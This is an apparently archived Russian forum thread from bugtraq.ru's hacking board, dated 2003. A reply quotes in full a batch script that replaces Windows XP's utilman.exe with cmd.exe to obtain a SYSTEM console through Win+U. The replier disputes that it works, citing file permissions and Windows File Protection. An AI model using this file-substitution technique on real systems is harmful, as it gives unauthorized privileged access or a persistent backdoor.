информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Умер Гордон Мур   Маск поддержал создателя Дилберта,...   Утечка сертификатов GitHub Desktop...
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / hacking		Имя Пароль

ФОРУМ все доски FAQ IRC новые сообщения site updates guestbook beginners sysadmin programming operating systems theory web building software hardware networking law hacking gadgets job dnet humor miscellaneous scrap регистрация Легенда:   новое сообщение   закрытая нитка   новое сообщение   в закрытой нитке   старое сообщение	Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания. Новичкам также крайне полезно ознакомиться с данным документом. Очередной эксплоит WinXP 12.02.03 21:17  Число просмотров: 5751 Автор: lem0n Статус: Незарегистрированный пользователь <"чистая" ссылка> Согласен со ЗлымШаманом. У Everyone права в %SYSTEMROOT% и ниже только на уровне "READ" и "READ and EXECUTE". Также, Windows FIle Protection сервис моментально начнет верещать и скопирует UTILMAN.EXE из system32\dllcache обратно вместо переименyованного. > Играясь в Винде ЭксПи с utility manager > (\system32\utilman.exe; это такая прога, вызываемая > WinKey+U, предназаначеная для всякого рода инвалидов, меня > в ней интересовали mousekeys - контроль курсора мышки с > клавы), я обнаружил следующую вещь: > при нажатии Win+U запускается 2 utilman'a: один с правами > текущего пользователя, второй - угадайте - правильно, с > правами SYSTEM. > Отсюда вытекает эксплоит с классической подменой exe-шника: > > rem --- XPloit.utilman.bat > ------------------------------------------- > @echo off > echo WinXP Utility manager exploit. Copyleft (c) Sashman, > 2003. > echo Make sure utilman.exe is not runing. > %systemdrive% > cd %windir%\system32\ > echo Renaming utilman.exe to utilman.exp... > ren utilman.exe utilman.exp > echo Copying cmd.exe to utilman.exe... > copy cmd.exe utilman.exe > echo Press WinKey-U to obtain a console with SYSTEM > privileges. > echo After you're finished, press a key to restore utilman. > pause>>nul > del utilman.exe > echo Renaming utilman.exp to utilman.exe... > ren utilman.exp utilman.exe > echo Good bye. > rem ------------- cut here > ------------------------------------------ > > > Правда, есть один нюанс: консоль с системными правами НЕ > появляется у юзера с админскими правами, хотя и присутсвует > в списке процессов. > (У обычных пользователей она, родимая, появляется, со всеми > вытекающими последствиями :) ). <hacking> Поиск  Очередной эксплоит WinXP - Sashman 12.02.03 15:35 [1362] Очередной эксплоит WinXP - lem0n 12.02.03 21:17 [5751] Посмотри разрешения на system32 и расслабься (-)  - ZloyShaman 12.02.03 16:00 [1559]

Copyright © 2001-2023 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach